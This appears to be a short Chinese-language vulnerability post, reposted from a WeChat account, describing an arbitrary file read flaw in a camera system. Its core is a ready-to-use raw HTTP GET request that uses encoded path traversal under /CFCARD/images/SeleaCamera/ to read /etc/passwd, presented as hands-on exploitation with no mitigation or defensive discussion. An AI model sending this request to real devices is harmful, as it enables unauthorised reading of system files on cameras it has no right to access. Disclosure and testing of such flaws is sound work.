漏洞描述
某摄像机系统存在任意文件读取漏洞,攻击者通过构造特定的Url读取服务器的文件
漏洞实战
访问漏洞url:
构造payload,请求包如下:
GET /CFCARD/images/SeleaCamera/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close
漏洞证明:
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
原文始发于微信公众号(儒道易行):某摄像机系统存在任意文件读取漏洞
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论